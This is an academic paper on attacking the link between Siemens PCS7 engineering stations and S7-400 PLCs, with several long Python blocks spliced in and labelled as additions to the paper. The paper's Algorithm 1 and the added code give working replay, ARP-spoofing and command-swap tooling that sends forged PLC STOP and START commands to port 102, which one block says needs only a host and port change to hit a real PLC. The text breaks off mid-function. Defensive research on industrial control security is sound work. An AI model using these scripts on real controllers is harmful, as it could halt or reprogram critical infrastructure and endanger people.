
International Journal of Critical Infrastructure Protection 22 (2018) 62–69

journal homepage: www.elsevier.com/locate/IJCIP

On PLC network security

Asem Ghaleb a, Sami Zhioua a,∗, Ahmad Almulhem b


a Information and Computer Science Department, King Fahd University of Petroleum and Minerals, Saudi Arabia
b Computer Engineering Department, King Fahd University of Petroleum and Minerals, Saudi Arabia

Article history: Received 28 October 2015; Revised 19 October 2017; Accepted 22 May 2018; Available online 11 June 2018

Keywords: Industrial Control Systems Security; SCADA Security

Abstract

The Programmable Logic Controller (PLC) is an important component in modern Industrial Control Systems (ICS), particularly in Supervisory Control and Data Acquisition (SCADA) systems. Disturbing the normal operation of PLCs can lead to significant damage ranging from minor annoyance to large scale incidents threatening the lives of people. While most of the existing work in the SCADA security literature focuses on the communication between PLCs and field devices, this paper presents a network security analysis of the communication between PLCs and the engineering stations in charge of setting up and configuring them. Interestingly, this aspect of SCADA security was exploited by the most famous SCADA attack, namely, Stuxnet. Using a testbed with a common PLC device, we successfully carried out three network attacks leading to serious compromise of typical PLCs.

© 2018 Elsevier B.V. All rights reserved.

1. Introduction

Industrial control systems (ICS) refer to several classes of computer-based control systems that include supervisory control and data acquisition (SCADA) systems, distributed control systems (DCS), and process control systems (PCS). These systems are widely used in the daily operation of many critical infrastructure and key resource (CIKR) sectors which are related directly to the health and well-being of citizens. They include sectors such as energy, water, transportation, chemical plants and communications, to name but a few. A failure in any of these sectors may have a negative cascading impact on our way of life. As such, their security is a major national concern worldwide [1].

SCADA is typically used to describe an ICS that monitors and controls transmission and distribution facilities. For example, electrical transmission and distribution systems deliver electricity, pipelines transport oil and gas, and aqueducts and distribution systems provide drinking water. A commonly used device in SCADA systems is the Programmable Logic Controller (PLC). A PLC is a control device responsible for collecting and processing input and output (I/O) data from field devices (e.g. motors, pumps, sensors, etc.).

As its name indicates, a PLC is programmable, that is, by loading a new program, the PLC can be reconfigured to function in a different way. Typically, a new program is loaded by connecting the PLC to an engineering station (equipped with configuration software) via a direct wire or through a LAN. In addition to reprogramming the PLC, the engineering station can send control commands to the PLC such as start, stop, check status, etc. Therefore, an attacker who can interfere with and/or compromise the communication between the engineering station and the PLC can cause a lot of damage to the whole SCADA system. The Stuxnet attack [2,3], which targeted Iran's nuclear facilities, exploited this particular vulnerability and loaded a malicious program onto the PLCs. Apart from Beresford's talk at Black Hat 2011 [4], this type of vulnerability has not been studied in the literature. Most of the existing work focuses on the HMI-PLC and on the PLC-field devices


Corresponding author.
E-mail addresses: [email protected] (A. Ghaleb), [email protected] (S. Zhioua), [email protected] (A. Almulhem).

https://doi.org/10.1016/j.ijcip.2018.05.004
1874-5482/© 2018 Elsevier B.V. All rights reserved.

communications [5–10] through protocols such as Modbus, DNP3, etc. The human machine interface (HMI) is a terminal display device which is usually used to display the status of the PLC and the control process in a graphical way. The HMI enables operators to interact with the PLCs and give them some commands. Moreover, the process output, alarms, events, etc. are displayed on the HMI. Some vendors deploy the HMI applications as part of the engineering station; however, the main functionality of the engineering station is to configure the PLC network topology and to design and write PLC logic programs.

This paper presents a security analysis of the network communication between PLCs and engineering stations. In the rest of the paper, engineering station refers to a host with PLC configuration software. In a testbed equipped with a common PLC, namely, the Siemens S7-400, in addition to its corresponding configuration software, namely, Simatic PCS7 8.1, we successfully carried out three network security attacks which allowed us to interfere with the PLC-PCS7 communication and send arbitrary commands to the PLC. The three security attacks, namely, replay, Man-In-The-Middle (MITM), and command modification, are common IT network security attacks, but they are not typically used to interfere with PLC-PCS7 communication.

The paper is organized as follows. In Section 2, we review related work from the literature. In Section 3, we provide some details about PLCs, their communication with the engineering stations, and related security considerations. The PLC lab setup is presented in Section 4. In Sections 5–7, we illustrate the replay, MITM, and stealth command modification attacks respectively. Finally, we provide concluding remarks in Section 8.

2. Related work

A number of research papers detail network attacks on SCADA systems. Most of the existing work focuses on studying attacks on the Modbus protocol, considered as the most established network protocol for Industrial Control Systems. Huitsing et al. proposed an exhaustive taxonomy of attacks targeting the Modbus protocol [11]. More than 200 attacks were reported and briefly discussed covering both variants of Modbus, namely, the serial variant and the TCP variant. Although the taxonomy was exhaustive, no attack has been implemented nor tested. Hence, for most of the listed attacks, there are no guarantees that they are feasible in practice.

Gao et al. reported and tested different categories of network attacks on SCADA involving several protocols (Modbus, DNP3, Allen Bradley) [6]. The attack categories included response injection, command injection, man-in-the-middle, replay, and denial of service. The attacks have been tested using a SCADA security laboratory (Mississippi State University SCADA security lab) combining virtual hosts, simulated components, and physical devices (water storage tank, etc.). According to the authors, most of the attacks were possible because none of the common ICS protocols use authentication or digital signatures. In addition to attack reporting, Gao et al. implemented an Intrusion Detection System (IDS) for SCADA based on neural networks. The IDS works by distinguishing between normal and abnormal behaviors. The IDS detection accuracy was above 90% for response injection attacks, but around 12% for replay attacks.

Morris and Gao tested a more complete set of network attacks on SCADA with a total of 17 attacks ranging from reconnaissance, response injection, command injection and denial of service, targeting mainly the Modbus protocol [9]. The attacks were tested on the same SCADA security testbed used by Gao et al. [6]. Reconnaissance attacks ranged from address scan to device identification. A response injection attack consists in injecting false data values in response packets sent by polled devices. A command injection attack consists in injecting false commands from rogue devices to alter set points (e.g. Low and High values of a water storage tank), to alter the system control scheme (manual vs automatic), or to change register bits on master devices. A denial of service attack is achieved by sending an invalid Cyclic Redundancy Code (CRC), by transmitting out-of-turn packets, or by a simple SYN flood.

The most recent work studying network attacks on SCADA systems is the one by Maynard et al. [10] which considers a less common protocol, namely, IEC 60870-5-104 (104 for short, widely used in control communication for water, gas and electricity utilities and particularly common in European systems). The work details two network attacks, namely, man-in-the-middle and replay. Both attacks consist of three steps: detection (detects 104 hosts), capture (capturing packets using sniffers), and attack (either replaying or modifying packets). The replay attack consists of replaying packets as they are (without any modification). Consequently, the attack does not work since the TCP/IP kernel drops packets with the same ack and seq numbers. Even Wireshark tags them in black since they are clearly replayed. The authors admit that the proof of concept replay attack can be made more efficient using a python script to replace packet values, which is exactly what we did in this paper. The MITM attack uses ARP poisoning between the SCADA server and the LAN gateway. Captured packets are first cleaned (non-104 packets are dropped), then the Cause of Transmission (CoT) flag, which is used to choose the correct program for processing the packet, is switched from ON to OFF. Two testing environments have been used for the MITM attack: a lab simulated environment and PRECYSE [12], which is a real electricity distribution testbed.

Almost all existing work in the literature focuses on studying network attacks while SCADA systems are running. All the attacks target the communication between MTUs (Master Terminal Units, e.g. PLCs) and RTUs (Remote Terminal Units, e.g. pumps, switches, etc.). This paper deviates from most of the existing work by focusing on the initial communication between a PLC and the engineering station (e.g. PCS7) whose aim is to control and reprogram the PLC.

The closest work to ours was presented by Beresford [4], in which several attacks on the communication between the engineering station and the PLC are reported. Beresford showed that several attacks are possible on the Siemens PLC S7-1200 and S7-300 models, such as replay, information retrieval, and even launching a remote shell on a PLC. However, when trying the reported attacks on our setting (Siemens PLC S7-400), they did not work. The explanation is that the PLC firmware in our setting is more recent and naturally more secure than the

firmware used in Beresford's experiments. Also, our replay attack is more "interactive" than Beresford's since some recorded packets are only replayed after a response is received from the PLC. Beresford's replay attack consists simply in sending all the recorded packets in sequence without considering any response from the PLC.

3. Programmable Logic Controller (PLC)

A PLC is a particular type of embedded device that is programmed to manage and control physical components (motors, valves, sensors, etc.) based on system inputs and requirements. A PLC typically has three main components, namely, an embedded operating system, control system software, and analog and digital inputs/outputs. Hence, a PLC can be considered as a special digital computer executing specific instructions that collect data from input devices (e.g. sensors), send commands to output devices (e.g. valves), and transmit data to a central operations center.

PLCs are commonly found in supervisory control and data acquisition (SCADA) systems as field devices. Because they contain a programmable memory, PLCs allow customizable control of physical components through a user-programmable interface. PLCs can be (re)configured using proprietary software installed on a standard computer (typically with Microsoft Windows OS). Reconfiguring the PLC consists in changing the control system software, also known as the programming layer of the PLC. This layer is in charge of providing the PLC device with the logic to manage the connected field devices. The programming layer can be reprogrammed using versions of typical languages such as C, Pascal, etc. To make PLC programming more accessible, a graphical language called Ladder logic is used. Indeed, Ladder logic allows engineers, who may be unfamiliar with full-fledged programming languages, to reconfigure the PLC through an easy and intuitive graphical interface.

A very common example of the configuration software is the Siemens Simatic Step 7 [13] for Simatic controllers. The software allows engineers to perform three main tasks: (1) write the graphical Ladder logic code, (2) compile it to machine code for execution and (3) upload the compiled code to the device.

3.1. PLC security issues

PLCs are typically located at the edges of the SCADA network, interfacing between the cyber and physical components. Hence, PLCs are critical to the operation of the industrial process. An adversary seizing control of a PLC may cause significant damage to the whole industrial process.

Besides, some characteristics of ICS field devices make them more vulnerable to cyber attacks. First, they are typically deployed for a long period of time (up to several decades). Second, ICS architectures often include several legacy devices lacking basic security features and not allowing the integration of new security features. Third, due to the high availability requirements, the replacement of field devices is not practically possible. Finally, common security solutions for IT systems are not applicable in a network involving ICS field devices because of performance and other requirements of control processes.

3.2. Engineering station–PLC communication

Major PLC manufacturers (Siemens, Allen-Bradley, Phoenix Contact, etc.) provide efficient software environments to program and configure their PLCs. The programs are written in a variety of languages including graphical languages such as Ladder logic. PLC programs need to be efficient, lightweight and guarantee secure communication with the other field devices once deployed.

Programming a PLC consists of uploading the written program to the PLC after it has been developed and tested at an engineering station. Typically, the engineering station is connected to the PLC with Ethernet. This communication can be point-to-point, involving a simple Ethernet cable between the PLC and the engineering station, or part of a network including other stations. Because the PLC program is in charge of controlling how the PLC works and commands field devices, the upload procedure should be performed in a secure way. An adversary who can interfere with this uploading procedure can launch a variety of attacks ranging from DoS to seizing full control of the PLC.

Simatic PCS7 is the programming environment for Siemens PLCs. It is a comprehensive software suite offering a variety of features to configure control systems, in particular PLCs. The software provides a graphical user interface for simple operation and clear display of configuration data. In order to upload a new configuration program, an engineering station with Simatic PCS7 software communicates with the PLC through Ethernet using COTP (Connection Oriented Transport Protocol).

COTP is an open systems transport layer protocol built on top of TCP. COTP is not commonly used and is based on a very old specification (RFC 905 [14]); its encapsulation in TCP, with a 4-byte TPKT header on port 102, is specified in RFC 1006. This enabled us to record COTP packets traveling between the PLC and the engineering station and then to target the PLC with several attacks. We found that COTP related traffic is transferred in plain text with no authentication. PLCs using COTP for communication with the engineering stations depend on password protection or authentication which can be evaded easily due to the fact that packets are transferred in plain text and can be crafted. Very scarce documentation about the COTP protocol is publicly available and few attempts were made to reverse engineer it [15]. Although the COTP protocol has been replaced by TCP in most applications, it is still being used by the Simatic PCS7 software. This can be seen as a manifestation of security-by-obscurity, which is a common protection measure in ICS.

As shown in Fig. 1, the three main commands that the engineering station with Simatic PCS7 software can send to the PLC are the following:

• Start command: turns the PLC on, assuming it is currently turned off. The start command is typically used when re-programming the PLC. In particular, the start command packets are sent along with the new PLC program packets.

• Stop command: turns off the PLC.
• Check status: enquires about the current status of the PLC.

Fig. 1 – Simatic PCS7 - PLC communication channel.

4. PLC lab setup

Fig. 2 shows the PLC lab setup used to implement network attacks on the PLC. The PLC used in the lab is a Siemens S7-400, which is typically used in power plants (including nuclear), pipelines, oil and gas refineries, and water and waste systems. Compared to the more popular S7-300, the S7-400 PLC is made for bigger and more complex machinery systems, with a faster processor, larger work memory and more Input/Output ports. Power is supplied to the PLC with a SITOP PSU8200 box. The engineering station is a Windows 7 host equipped with Siemens Simatic PCS7 V8.0 software. Attacks are launched from an adversary station with Kali Linux 1.09. The PLC as well as the stations are connected through a network switch, namely, a Siemens Scalance X208.

Fig. 2 – PLC lab setup.
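Section 3.2 states that the PCS7-PLC traffic on TCP port 102 is plain text with no authentication, and the command detection step of Section 7 depends on recognising start and stop commands in that traffic. The following decoder is an added example, not code from the paper or from PCS7: it splits a port-102 TCP payload into its TPKT and COTP headers and the S7comm PDU they carry, and classifies PLC start/stop jobs. The layout is assumed from RFC 1006 (TPKT), ISO 8073 (COTP) and the public Wireshark s7comm dissector (protocol id 0x32, function codes 0x28 "PLC control" and 0x29 "PLC stop", PI service name "P_PROGRAM"); the sample frames are constructed by hand, not captured from the S7-400 testbed.

```python
"""Decode the plain-text ISO-on-TCP framing (TPKT/COTP) that carries S7comm on port 102
and classify PLC start/stop jobs. Added example, not code from the paper or from PCS7.
Layouts follow RFC 1006 (TPKT), ISO 8073 / RFC 905 (COTP) and the public Wireshark
s7comm dissector; the sample frames are constructed by hand, not captured."""
import struct

COTP_CR, COTP_CC, COTP_DT = 0xE0, 0xD0, 0xF0      # COTP PDU types (high nibble)
S7_PROTO_ID = 0x32
ROSCTR = {1: "job", 2: "ack", 3: "ack_data", 7: "userdata"}
# S7comm function codes as named by the Wireshark dissector (only those used here)
FUNC = {0x04: "read_var", 0x05: "write_var", 0x28: "plc_control",
        0x29: "plc_stop", 0xF0: "setup_comm"}


def parse_tpkt(buf):
    """Split one TPKT-framed segment into (COTP PDU type, COTP payload)."""
    if len(buf) < 7 or buf[0] != 3:
        raise ValueError("not a TPKT frame")
    if struct.unpack("!H", buf[2:4])[0] != len(buf):
        raise ValueError("TPKT length does not match segment")
    li = buf[4]                       # COTP length indicator: header bytes after LI
    pdu_type = buf[5] & 0xF0          # low nibble is the credit field, mask it off
    return pdu_type, buf[5 + li:]


def parse_s7(payload):
    """Parse the S7comm header; returns a dict, or None if this is not S7comm."""
    if len(payload) < 10 or payload[0] != S7_PROTO_ID:
        return None
    rosctr = payload[1]
    pdu_ref, param_len, data_len = struct.unpack("!HHH", payload[4:10])
    hdr_len = 12 if rosctr in (2, 3) else 10      # ack/ack_data carry 2 error bytes
    params = payload[hdr_len:hdr_len + param_len]
    data = payload[hdr_len + param_len:hdr_len + param_len + data_len]
    return {"rosctr": ROSCTR.get(rosctr, rosctr), "pdu_ref": pdu_ref,
            "function": FUNC.get(params[0], params[0]) if params else None,
            "params": params, "data": data}


def classify(segment):
    """'PLC START', 'PLC STOP' or None for one TCP payload sent towards port 102.
    Only 'job' PDUs count: the PLC's ack_data replies echo the same function codes."""
    pdu_type, payload = parse_tpkt(segment)
    if pdu_type != COTP_DT:
        return None                   # connection setup, nothing to classify
    s7 = parse_s7(payload)
    if s7 is None or s7["rosctr"] != "job":
        return None
    if s7["function"] == "plc_stop":
        return "PLC STOP"
    # 0x28 also carries block insert/delete etc.; P_PROGRAM selects a program start
    if s7["function"] == "plc_control" and b"P_PROGRAM" in s7["params"]:
        return "PLC START"
    return None


def detect_commands(segments):
    """Commands found, in order, in a list of PCS7->PLC payloads; junk is skipped."""
    found = []
    for seg in segments:
        try:
            label = classify(seg)
        except ValueError:
            continue
        if label:
            found.append(label)
    return found


def build_job(function, params_after_fc, pdu_ref=0x1234):
    """Constructed TPKT/COTP-DT/S7comm job (test input, assumed layout)."""
    params = bytes([function]) + params_after_fc
    s7 = struct.pack("!BBHHHH", S7_PROTO_ID, 1, 0, pdu_ref, len(params), 0) + params
    body = bytes([2, COTP_DT, 0x80]) + s7           # LI=2, DT, TPDU nr 0 + EOT bit
    return struct.pack("!BBH", 3, 0, 4 + len(body)) + body


# Constructed samples: PLC stop, PLC (re)start, a read request, a COTP connection request
SAMPLE_STOP = build_job(0x29, b"\x00" * 5 + b"\x09P_PROGRAM")
SAMPLE_START = build_job(0x28, b"\x00" * 7 + b"\x00\x00\x09P_PROGRAM", pdu_ref=0x1235)
SAMPLE_READ = build_job(0x04, b"\x01\x12\x0a\x10\x02\x00\x01\x00\x00\x83\x00\x00\x00")
SAMPLE_CR = bytes.fromhex("0300001611e00000000100c0010ac1020100c2020102")

if __name__ == "__main__":
    for name, seg in [("stop", SAMPLE_STOP), ("start", SAMPLE_START),
                      ("read", SAMPLE_READ), ("cotp cr", SAMPLE_CR)]:
        print(name, "->", classify(seg))
```

Two things the decoder makes visible: every field the PCS7 host sends, including the PDU reference the PLC echoes back, is readable and forgeable without any key, and the same function codes appear in the PLC's ack_data replies, so a detector that does not check the ROSCTR (or the traffic direction) would fire on responses as well as on commands.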

5. Replay attack

The first implemented PLC network attack is a typical replay attack. The attack consists of 3 steps: starting a PCS7 command (stop, start, etc.), capturing the packets, and replaying the captured packets at a later time. The captured packets corresponding to a given command are first processed by filtering out any packets that are not part of the command's traffic. Since PCS7-PLC communication uses the COTP protocol (port 102), any other packets are filtered out. In addition, only packets in the PCS7-PLC direction are kept (packets in the opposite direction are filtered out). The cleaned traffic for each command is then stored in a pcap file.

Initially, the tcpreplay [16] suite is used to replay the recorded packets (cleaned pcap file). The tcpreplay suite comes with different tools such as tcpprep (packet pre-processor that isolates packets in each direction), tcprewrite (pcap file editor which rewrites packet headers), tcpreplay (replays pcap files onto the network), etc. Using these tools, the pcap file is pre-processed before replaying by changing the source IP address and recomputing the checksum value in each packet. Once the pre-processed pcap file is replayed on the PLC, most of the packets are discarded by the PLC and the replay attack fails. After investigation, it turns out that the packets are discarded for two main reasons. First, the sequence (SEQ) and acknowledgment (ACK) numbers in the replayed packets are not changed. Consequently, the TCP/IP kernel at the PLC tags those packets as duplicates and discards them. Second, the tcpreplay tool replays the packets in the pcap file one after the other without waiting for any response from the PLC. Hence, the PLC receives some packets out of the proper sequence and discards them. This problem has recently been observed by Maynard et al. [10].

To overcome these problems and to guarantee that the replayed packets are accepted by the TCP/IP kernel at the PLC, we resorted to writing a customized python script using scapy [17]. Scapy is a powerful packet manipulation program written in python and hence can be easily used in python scripts. It features a variety of packet manipulation capabilities including: sniffing and replaying packets in the network, network scanning, tracerouting, etc. However, the most useful scapy features for our replay attack are the ability to rewrite the sequence and acknowledgment numbers and to match requests and replies.

Dealing with the duplicate sequence and acknowledgment numbers consists of recalculating these numbers and rewriting them with scapy. Manipulating packet headers using scapy is straightforward since any packet field is simply accessible by the dot operator (e.g. ip.src, tcp.flags, rcv[TCP].seq). Initially, random sequence and acknowledgment numbers are chosen. Then, at each packet sending, the numbers are incremented and added to the next packet.

Replaying packets in the appropriate sequence and time requires waiting for the response to some packets before releasing the next packet. Scapy provides several variants of the send function which is in charge of sending a packet in the network. For packets not requiring a response (e.g. an acknowledgment packet), the simple sendp function is used. The sendp function takes as input the packet as well as the network interface. For packets requiring a response, several functions can be used:

• sr: Send and receive packets at layer 3
• sr1: Send packets at layer 3 and return only the first answer
• srp: Send and receive packets at layer 2
• srp1: Send and receive packets at layer 2 and return only the first answer
• srloop: Send a packet at layer 3 in a loop and print the answer each time
• srploop: Send a packet at layer 2 in a loop and print the answer each time

In our program, we used the srp1 function because there is always one single response packet sent by the PLC.

Algorithm 1 shows the core of the python script using the scapy features. The REPLAY subroutine takes as input the pcap file, the network interface, the attacker's IP address and port number. In addition, arbitrary values are chosen to initialize the ACK and RSTACK numbers. The for loop inside the subroutine goes through the packets one by one. For each packet, the IP and TCP checksums are removed (lines 7 and 8) so that the network interface card recalculates newer values, the source IP and port numbers are updated (lines 9 and 10), the sequence numbers are incremented (lines 12 and 20), and the packet is replayed using either the sendp function (for SYN and RST packets) or the srp1 function (lines 14 and 19).

The two other subroutines, namely, MITMCONF and MAIN, are added to make the attack script self-contained. MITMCONF is in charge of configuring both Snort and syslog while MAIN is the driver function that will call either MITMCONF or REPLAY depending on the value of the last parameter.

The above python program has been tested using two attack scenarios. In the first scenario, the replay attack was launched from the same host (IP address) used for the capture, that is, the host with PCS7 software. In the second scenario, the replay attack was launched from a different host on the same network, that is, the attacker machine with Kali. In each scenario, two types of commands are tried, namely, start and stop. The replay attack was successful in both scenarios for both types of commands. Hence, an unknown attacker machine (without PCS7 software) on the same network can turn the PLC ON or OFF by simply replaying a start or stop command. This clearly might cause significant damage to a SCADA system.

6. Man In the middle attack

The communication between the PCS7 host and the PLC uses COTP over Ethernet. The Ethernet protocol uses the Address Resolution Protocol (ARP). Hence, theoretically the communication is vulnerable to Man In The Middle (MITM) attacks through ARP poisoning.

In a switched Ethernet network, a host A who tries to communicate with a host B (with a known IP address) needs its physical address (MAC). The MAC address can be obtained by broadcasting an ARP request to all hosts in the network. In a normal scenario, only host B will send a response with the correct IP-MAC pair. In an attack scenario, an attacker (host C) in the same network will send a fake response with a false IP-MAC pair claiming to be the owner of B's IP address. Typically, the attacker floods the network with its fake response, forcing

the victim host (A) to accept the false pairing and ignore the correct one sent by host B. ARP poisoning is typically launched between two hosts, allowing the attacker to insert himself as a tunnel between the two victims and consequently sniff all packets between them.

In our scenario, an ARP poisoning MITM attack is implemented between the PCS7 host and the PLC using the ettercap tool [18]. The attack is successful and all the packets exchanged between the PCS7 host and the PLC are tunneled through the attacker host (Kali). A MITM attack can be passive or active. A passive version consists in simply observing the traffic of the PLC and hence breaking the confidentiality of the commands sent to the PLC. An active version is more dangerous since it allows the attacker to tamper with the packets and commands and consequently interfere with the normal operation of the system.

Algorithm 1 Replay a sequence of captured packets using Scapy.
 1: function replay(pcapfile, eth_interface, srcIP, srcPort)
 2:   recvSeqNum ← 0
 3:   SYN ← True
 4:   for packet in rdpcap(pcapfile) do
 5:     ip ← packet[IP]
 6:     tcp ← packet[TCP]
 7:     del ip.chksum                         ▷ clear both checksums so they are recomputed on send
 8:     del tcp.chksum
 9:     ip.src ← srcIP                        ▷ rewrite source IP and port to the attacker machine
10:     tcp.sport ← srcPort
11:     if tcp.flags == ACK or tcp.flags == RSTACK then
12:       tcp.ack ← recvSeqNum + 1            ▷ acknowledge the last sequence number seen from the PLC
13:       if SYN or tcp.flags == RSTACK then
14:         sendp(packet, iface=eth_interface) ▷ SYN/RST packets: no reply is awaited
15:         SYN ← False
16:         continue
17:       end if
18:     end if
19:     rcv ← srp1(packet, iface=eth_interface) ▷ send and wait for the PLC's single reply
20:     recvSeqNum ← rcv[TCP].seq
21:   end for
22: end function
23: function mitmconf(eth_interface)
24:   snort_conf_file ← '/etc/snort/snort.conf'
25:   syslog_conf_file ← '/etc/syslog-ng/syslog-ng.conf'
26:   # Configuring Snort: forward alerts to syslog, facility local6
27:   fsnort ← open(snort_conf_file, 'a')
28:   fsnort.write("output alert_syslog: LOG_LOCAL6 LOG_ALERT\n")
29:   fsnort.close()
30:   # Configuring syslog-ng: match the two Snort alert messages and run the replay script
31:   fsyslog ← open(syslog_conf_file, 'a')
32:   fsyslog.write("filter f_start_plc { facility(local6) and match(\"PLC START\" value(\"MESSAGE\")); };\n")
33:   fsyslog.write("filter f_stop_plc { facility(local6) and match(\"PLC STOP\" value(\"MESSAGE\")); };\n")
34:   fsyslog.write("destination d_start_plc { program(\"python /root/replay.py stop.pcap " + eth_interface + "\"); };\n")   ▷ start detected: replay a stop
35:   fsyslog.write("destination d_stop_plc { program(\"python /root/replay.py start.pcap " + eth_interface + "\"); };\n")   ▷ stop detected: replay a start (start.pcap: assumed file name)
36:   fsyslog.write("log { source(s_src); filter(f_start_plc); destination(d_start_plc); };\n")   ▷ s_src: the source already defined in syslog-ng.conf (assumed name)
37:   fsyslog.write("log { source(s_src); filter(f_stop_plc); destination(d_stop_plc); };\n")
38:   fsyslog.close()
39: end function
40: function main
41:   if len(sys.argv) != 6 then
42:     exit(1)
43:   end if
44:   if sys.argv[5] == '1' then
45:     MITMCONF(sys.argv[2])
46:   end if
47:   if sys.argv[5] == '2' then
48:     REPLAY(sys.argv[1], sys.argv[2], sys.argv[3], int(sys.argv[4]))
49:   end if
50: end function

7. Stealth command modification attack

The third attack is a combination of the replay and MITM attacks which aims at sniffing the traffic between the PCS7 host and the PLC and then interfering with the sent commands by replaying other commands in a stealthy way. Through this attack, an adversary can completely change the behavior of the SCADA system since sending a command leads to the execution of another command.

The attack goes through three main steps: MITM attack, command detection, and replay of a false command. Fig. 3 illustrates the attack. Initially, the attacker (Kali) starts by launching a MITM attack to place himself between the PCS7 host and the PLC exactly as described in the previous section. Then, it stays in an idle state observing the traffic passively and waiting for commands sent by the PCS7 host to the PLC (Step 1 in Fig. 3). For the sake of command detection in the network, the Snort intrusion detection system (IDS) [19] is used. Snort is a signature-based network IDS which allows to detect patterns of traffic inside the network. Currently, Snort is configured to detect two types of commands, namely, start and stop. As soon as the attacker detects a command from the PCS7 host to the PLC (Step 2), a different command will be replayed to the PLC (Step 4). That is, if a start command is detected, the attacker replays a stop command to the PLC. If a stop command is detected, the attacker replays a start command (with a different PLC program¹) to the PLC. However, it is easy to notice that if the attacker interferes with a start command to make it a stop command (or the opposite), the PCS7 host will quickly notice that something is wrong. To make the attack as stealthy as possible, the attacker continues the communication with the PCS7 host while impersonating the PLC (Step 3). So for the PCS7 host the communication appears to be perfectly normal. This technique has been used by Stuxnet in its famous attack on Iran's nuclear facility. Indeed, to make the attack stealthy, Stuxnet recorded normal frequency values. Then, at attack time, it played those recorded frequencies to make the monitoring system believe that the centrifuges were operating as normal [2,3].
¹ Recall that the start command is sent along with the new PLC program packets (Section 3).
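The forged ARP reply that Section 6 describes (what ettercap puts on the wire) and the binding-conflict check that the concluding remarks propose as a defense (static ARP entries), as an added Python example that is not the paper's code. The frame layout is RFC 826 over Ethernet II; the MAC and IP addresses are made up, and the frames are only built and parsed, never transmitted (that would need a raw socket and root, and is what ettercap already does).

```python
"""ARP poisoning frame (Section 6) and a binding-conflict check (the static-ARP defense
of the conclusion). Added example, not the paper's code; addresses are made up and
frames are only built and parsed here, never transmitted (ettercap does that)."""
import struct

ETH_P_ARP = 0x0806


def mac(s):
    return bytes.fromhex(s.replace(":", ""))


def ip4(s):
    return bytes(int(x) for x in s.split("."))


def mac_str(b):
    return ":".join("%02x" % x for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame with an ARP reply (RFC 826, opcode 2) telling target_ip's host
    that sender_ip lives at sender_mac. The attacker forges it with its own MAC as
    sender_mac and the victim peer's IP as sender_ip."""
    eth = mac(target_mac) + mac(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)   # Ethernet, IPv4, hlen, plen, reply
    arp += mac(sender_mac) + ip4(sender_ip) + mac(target_mac) + ip4(target_ip)
    return eth + arp


def parse_arp(frame):
    """(opcode, sender_mac, sender_ip, target_mac, target_ip), or None if not IPv4/Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    a = frame[22:42]
    return op, mac_str(a[0:6]), ip_str(a[6:10]), mac_str(a[10:16]), ip_str(a[16:20])


class ArpWatch:
    """Remembers the IP->MAC binding advertised by each ARP reply and reports when a later
    reply rebinds a known IP to another MAC, which is exactly what poisoning looks like
    on the wire. Pre-loading 'pinned' bindings plays the role of static ARP entries."""

    def __init__(self, pinned=None):
        self.table = dict(pinned or {})
        self.alerts = []

    def observe(self, frame):
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != 2:       # requests carry no binding we trust
            return None
        _, smac, sip, _, _ = parsed
        known = self.table.get(sip)
        if known is not None and known != smac:
            alert = (sip, known, smac)
            self.alerts.append(alert)
            return alert
        self.table.setdefault(sip, smac)
        return None


# Constructed lab addresses (not the testbed's real ones)
PLC_IP, PLC_MAC = "192.168.0.10", "00:1b:1b:aa:bb:cc"
PCS7_IP, PCS7_MAC = "192.168.0.20", "00:0c:29:11:22:33"
KALI_MAC = "00:0c:29:de:ad:01"


def demo():
    """Genuine reply from the PLC, then the attacker's forged one; returns the alerts."""
    watch = ArpWatch()
    watch.observe(build_arp_reply(PLC_MAC, PLC_IP, PCS7_MAC, PCS7_IP))
    watch.observe(build_arp_reply(KALI_MAC, PLC_IP, PCS7_MAC, PCS7_IP))  # "PLC_IP is at KALI"
    return watch.alerts


if __name__ == "__main__":
    print(demo())
```

A full MITM poisons both directions, so the attacker sends the mirror frame to the PLC as well (sender_ip = PCS7_IP, sender_mac = KALI_MAC, target = the PLC). The watcher only sees the attack if it sees the ARP traffic, that is, if it runs on the victim hosts or on a switch mirror port; on the engineering station and the PLC, pinning the two bindings as static entries removes the dependency on ARP replies altogether, which is the measure the paper suggests.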

Fig. 3 – Stealth command modification attack.
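Algorithm 1 (Section 5) replays recorded frames and therefore has to rewrite SEQ/ACK numbers, because the PLC's TCP stack discards duplicates. The following example, added here and not the paper's replay.py, replays the same captured command at the application layer instead: it opens a fresh TCP connection to port 102 as PCS7 would, re-sends the recorded TPKT/COTP payloads, and, like srp1 in Algorithm 1, waits for the PLC's single reply before releasing the next request (Step 4 of Section 7 needs the same behaviour). Because the kernel owns the new connection, valid sequence numbers come for free. The "captured" STOP and START requests are constructed by hand from the public S7comm layout, not taken from the S7-400 testbed, and the PLC stand-in that answers them runs on loopback, so the code runs offline; against a real PLC only host and port change.

```python
"""Application-layer replay of captured PCS7->PLC commands (Section 5 / Algorithm 1).
Added example, not the paper's replay.py. Instead of rewriting SEQ/ACK numbers of
recorded frames with scapy, the recorded TCP payloads are re-sent over a fresh TCP
connection, so the kernel generates valid sequence numbers itself; like srp1 in
Algorithm 1, each request waits for the PLC's single reply before the next is sent.
The 'captured' requests are constructed by hand (public S7comm layout, not a real
S7-400 capture) and the PLC stand-in runs on loopback so the code runs offline."""
import socket
import struct
import threading

# Constructed captures: S7 PLC STOP job (pdu ref 0x1234) and PLC START job (0x1235),
# each framed as TPKT / COTP DT / S7comm as they appear on port 102
CAPTURED_STOP = bytes.fromhex("0300002102f080" "3201000012340010000029000000000009") + b"P_PROGRAM"
CAPTURED_START = bytes.fromhex("0300002502f080" "320100001235001400002800000000000000000009") + b"P_PROGRAM"


def recv_tpkt(sock):
    """Read exactly one TPKT message (4-byte header, bytes 2-3 = total length); None on EOF."""
    buf = b""
    need = 4
    while len(buf) < need:
        chunk = sock.recv(need - len(buf))
        if not chunk:
            return None
        buf += chunk
        if len(buf) == 4:
            need = struct.unpack("!H", buf[2:4])[0]
    return buf


def replay(host, port, payloads, timeout=3.0):
    """Connect like the engineering station and replay the recorded requests in order,
    waiting for the reply to each; returns the replies (None where none arrived)."""
    replies = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        for p in payloads:
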